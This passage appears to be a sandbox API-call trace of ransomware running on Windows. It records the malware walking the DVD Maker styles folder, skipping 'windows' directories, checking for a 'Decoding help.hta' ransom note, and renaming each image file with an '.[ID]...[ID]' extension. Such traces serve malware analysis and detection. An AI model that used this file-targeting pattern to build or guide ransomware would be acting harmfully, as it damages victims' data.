Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" [0050.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.129] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoy", cAlternateFileName="")) returned 1 [0050.129] lstrcmpW (lpString1=".", lpString2="BabyBoy") returned -1 [0050.129] lstrcmpW (lpString1="..", lpString2="BabyBoy") returned -1 [0050.129] lstrcmpiW (lpString1="windows", lpString2="BabyBoy") returned 1 [0050.132] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.132] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.132] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="BabyBoy" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" [0050.132] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*.*" [0050.132] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0050.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25037508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0050.143] CloseHandle (hObject=0x628) returned 1 [0050.143] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyGirl", cAlternateFileName="")) returned 1 [0050.143] lstrcmpW (lpString1=".", lpString2="BabyGirl") returned -1 [0050.143] lstrcmpW (lpString1="..", lpString2="BabyGirl") returned -1 [0050.143] lstrcmpiW (lpString1="windows", lpString2="BabyGirl") returned 1 [0050.158] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.158] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.158] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="BabyGirl" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" [0050.158] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*.*" [0050.158] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0050.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250976a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0050.204] CloseHandle (hObject=0x628) returned 1 [0050.204] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecb0968, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ecb0968, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlackRectangle.bmp", cAlternateFileName="")) returned 1 [0050.266] lstrcpyW (in: lpString1=0x251679f8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0050.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0050.266] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BlackRectangle.bmp") returned 1 [0050.266] lstrlenW (lpString="BlackRectangle.bmp") returned 18 [0050.266] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="BlackRectangle.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" [0050.266] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" [0050.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0050.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.689] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0x0, dwReserved1=0x0, cFileName="circleround_glass.png", cAlternateFileName="")) returned 1 [0051.689] lstrcpyW (in: lpString1=0x5f00e18, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0051.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0051.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0051.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0051.689] lstrcmpiW (lpString1="Decoding help.hta", lpString2="circleround_glass.png") returned 1 [0051.689] lstrlenW (lpString="circleround_glass.png") returned 21 [0051.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0051.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0051.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="circleround_glass.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" [0051.689] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" [0051.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.[ID]g9uZrLhJaygpwRm1[ID]" [0051.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.690] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0x0, dwReserved1=0x0, cFileName="circleround_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0051.690] lstrcpyW (in: lpString1=0x5f00e18, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0051.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0051.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0051.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0051.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="circleround_selectionsubpicture.png") returned 1 [0051.690] lstrlenW (lpString="circleround_selectionsubpicture.png") returned 35 [0051.690] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0051.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0051.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0051.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="circleround_selectionsubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" [0051.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" [0051.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0051.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.441] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebcc13a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebcc13a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="circleround_videoinset.png", cAlternateFileName="")) returned 1 [0052.441] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0052.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0052.441] lstrcmpiW (lpString1="Decoding help.hta", lpString2="circleround_videoinset.png") returned 1 [0052.441] lstrlenW (lpString="circleround_videoinset.png") returned 26 [0052.441] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0052.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="circleround_videoinset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" [0052.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" [0052.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.441] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edbb2f3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6edbb2f3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c53d379, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0x0, dwReserved1=0x0, cFileName="Circle_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0052.441] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.441] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0052.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0052.442] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Circle_ButtonGraphic.png") returned 1 [0052.442] lstrlenW (lpString="Circle_ButtonGraphic.png") returned 24 [0052.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Circle_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" [0052.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" [0052.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.442] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e990cc7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e990cc7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="circle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0052.442] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0052.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0052.442] lstrcmpiW (lpString1="Decoding help.hta", lpString2="circle_glass_Thumbnail.bmp") returned 1 [0052.442] lstrlenW (lpString="circle_glass_Thumbnail.bmp") returned 26 [0052.442] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0052.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="circle_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" [0052.442] lstrcatW (in: lpString1="", 